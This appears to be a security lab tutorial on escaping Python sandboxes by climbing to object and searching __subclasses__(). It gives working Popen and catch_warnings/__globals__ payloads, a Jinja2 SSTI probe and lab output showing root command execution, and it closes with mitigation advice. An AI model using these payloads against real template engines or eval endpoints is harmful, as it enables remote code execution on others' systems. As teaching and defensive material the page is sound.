PyFu

Walking the Python Object Graph with __subclasses__()

Python-based Vulnerabilities Anatomy

Almost every Python sandbox escape, pickle gadget, and template-injection RCE you will ever write ends in the same place: walking from some harmless object up to the base object type, enumerating its subclasses, and finding one that hands you code execution. This page documents that chain as a standalone primitive, because once you understand it you stop memorizing payloads and start deriving them on the spot for whatever objects a given jail leaves you.

The technique exists because of two facts about CPython’s object model. First, every class ultimately inherits from object, and object keeps a registry of every subclass ever created, reachable through __subclasses__(). Second, that registry includes every class currently loaded into the interpreter, not just the ones the target code imported. If subprocess has been imported anywhere in the process, subprocess.Popen is sitting in that list waiting to be called, whether or not the code you are attacking ever referenced it.

Climbing to object

You can start from any object literal, an empty string, an empty list, a tuple, an integer, and reach the root of the type hierarchy. The steps are __class__ to get the type, then __mro__ (method resolution order) or __base__ to climb to object:

>>> ''.__class__
<class 'str'>
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)
>>> ''.__class__.__mro__[-1]
<class 'object'>
>>> ().__class__.__base__          # the shorter, equivalent path
<class 'object'>

__mro__[-1] is always object, and __base__ walks up one level at a time. Both land on the same place. This matters in restricted environments where a filter blocks one attribute name but not the other, you usually have several equivalent routes up the graph.

Enumerating subclasses

Once you hold object, __subclasses__() returns every loaded subclass:

>>> len(object.__subclasses__())
215
>>> ''.__class__.__mro__[-1].__subclasses__()[:5]
[<class 'type'>, <class 'async_generator'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>]

The list is long and its order depends on what has been imported and on the CPython version, so hardcoding an index like __subclasses__()[137] is brittle. Always select by name instead. See Python Introspection for the full dump and the enumeration mechanics.

Gadget 1: subprocess.Popen by name

If subprocess is loaded, the cleanest path to a shell is to find Popen in the subclass list and instantiate it directly:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'Popen'][0]('id', shell=True, stdout=-1).communicate()

This filters the subclass list for the class literally named Popen, instantiates it with a command, and reads the output, all without an import subprocess statement anywhere in the payload. This is the workhorse for Jinja2 SSTI and PyJail challenges. Its only weakness is the dependency on subprocess having been imported.

Gadget 2: recovering __builtins__ through any function

The more robust gadget does not depend on subprocess. Every Python-level function carries its defining module’s namespace in __globals__, and that namespace contains __builtins__, the full builtin table, including __import__. You just need to reach any function object from the subclass list.

A class that is always present is warnings.catch_warnings (the warnings module is imported during interpreter startup). It exposes its module through an attribute, from which __builtins__ is one hop away:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('id')

Equivalently, reach __globals__ through any subclass’s __init__ and pull os straight out:

[c for c in ().__class__.__base__.__subclasses__()
 if c.__name__ == 'catch_warnings'][0].__init__.__globals__['__builtins__']['__import__']('os').system('id')

This is the gadget that survives a sandbox which deleted __builtins__ from the execution namespace, because you are not using the namespace’s builtins, you are rebuilding them from an object you reached through the graph. That makes it the foundation of Escaping Python exec and eval Sandboxes.

Why the chain is hard to kill

Defenders frequently try to block this by stripping __builtins__, blacklisting the word import, or removing dangerous names from the namespace. None of it works, because the attack never relies on the namespace it was handed. As long as the attacker can evaluate any attribute access on any object, they can climb to object, enumerate the process’s loaded classes, and rebuild whatever was taken away.

The only durable mitigations operate below the language: do not pass untrusted input to an evaluator at all; if you must, run it in a separate process under OS-level confinement (seccomp, a container with a read-only filesystem and no network, gVisor). Attribute-level blacklists inside the same interpreter are a speed bump, not a boundary.

Tested on CPython 3.12.3. The takeaway: __subclasses__() turns “I can evaluate one Python expression” into “I have every loaded class in the process”, and from there code execution is a search problem, not a privilege problem. When you audit any feature that evaluates user-controlled Python, assume this chain is available and design as if __builtins__ cannot be hidden. The runnable demonstration is generic-py-fu/object-model/subclasses-walk.py in the lab.

Running it in the lab

docker compose run --rm generic-py-fu python3 object-model/subclasses-walk.py
STEP 1: Climbing from a literal up to `object`
''.__class__.__mro__:      (<class 'str'>, <class 'object'>)
().__class__.__base__:     <class 'object'>
Both routes land on the same root: True

STEP 2: Enumerating object.__subclasses__()
Total loaded subclasses of object: 234
First 5: ['type', 'async_generator', 'bytearray_iterator', 'bytearray', 'bytes_iterator']

STEP 3 / GADGET 1: subprocess.Popen by name -> run `id`
Found Popen via the subclass list: <class 'subprocess.Popen'>
Command output: uid=0(root) gid=0(root) groups=0(root)

STEP 4 / GADGET 2: recover __builtins__ via catch_warnings -> `id`
Recovered __builtins__ through __init__.__globals__ (keys: 157 entries)
Calling __import__('os').system('id') ...
uid=0(root) gid=0(root) groups=0(root)

One evaluable expression reached every loaded class and then code execution, with no imports written and no builtins in scope.

Why object-graph walking matters from an offensive security perspective

I treat __subclasses__() as the universal solvent of Python exploitation. The moment an assessment hands me a single evaluable expression, this primitive converts that toehold into the entire set of classes loaded in the process, and from there into code execution, without me importing anything or relying on whatever names the target left in scope. It is what makes “I can evaluate one expression” and “I have RCE” the same sentence.

What an attacker prizes here is reach. The graph does not respect the boundary the developer thought they drew. A jail that deletes __builtins__, blacklists import, or scrubs dangerous names still hands me ''.__class__, and that one attribute access is enough to climb to object, enumerate every subclass, and rebuild __import__ out of any function’s __globals__. The richer the process (more imported modules, more loaded classes), the more gadgets sit waiting in the subclass list.

Where I look for the reachable sink during an assessment:

  • Template engines rendering user input. Any Jinja2/Mako/Tornado context where I control the template string is a direct expression sink; {{ ''.__class__.__mro__[-1].__subclasses__() }} is my first probe.
  • eval/exec on user data. Calculator endpoints, formula fields, rule engines, “advanced search” filters, and admin “run expression” features almost always reduce to attribute access on live objects.
  • Pickle and YAML object reconstruction. Once I have any deserialization foothold, the same graph walk lets me reach functions I was never handed (see Insecure Deserialization - Python Pickle and Insecure Deserialization - Unsafe YAML Loading).
  • Restricted REPLs and debug consoles exposed in production, where the author assumed attribute filtering was a boundary.

The audit tell is any code path where attacker input flows into expression evaluation against real objects, regardless of how many names the surrounding sandbox strips. For defenders the takeaway is blunt: attribute-level blacklists inside the interpreter are not a security boundary, so the only durable control is to never evaluate untrusted expressions against live objects in the first place.

Mitigation

There is no fix at the object-graph level, because the climb from any object to object.__subclasses__() and on to __globals__ is intrinsic to Python’s data model; the only effective defense sits upstream, in never letting an attacker evaluate expressions against live objects in the first place. That means eliminating the eval, exec, or template-injection entry point that grants expression evaluation, and where untrusted code must run, isolating it in a separate operating-system-sandboxed process rather than attempting to prune attributes or blocklist class names inside the same interpreter.